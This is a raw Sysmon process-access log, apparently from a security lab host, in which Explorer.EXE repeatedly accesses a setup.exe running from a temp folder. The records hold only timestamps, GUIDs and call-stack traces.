13:59:52.161{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014308Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.161{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014307Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.161{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014306Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.161{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014305Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.161{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014304Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.161{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000014303Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.161{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014302Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.161{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014301Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.146{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014300Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.146{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014299Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.146{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000014298Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.146{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014297Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.146{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014296Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.146{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000014295Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.146{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000014294Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.146{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014293Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.146{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014292Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.146{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dl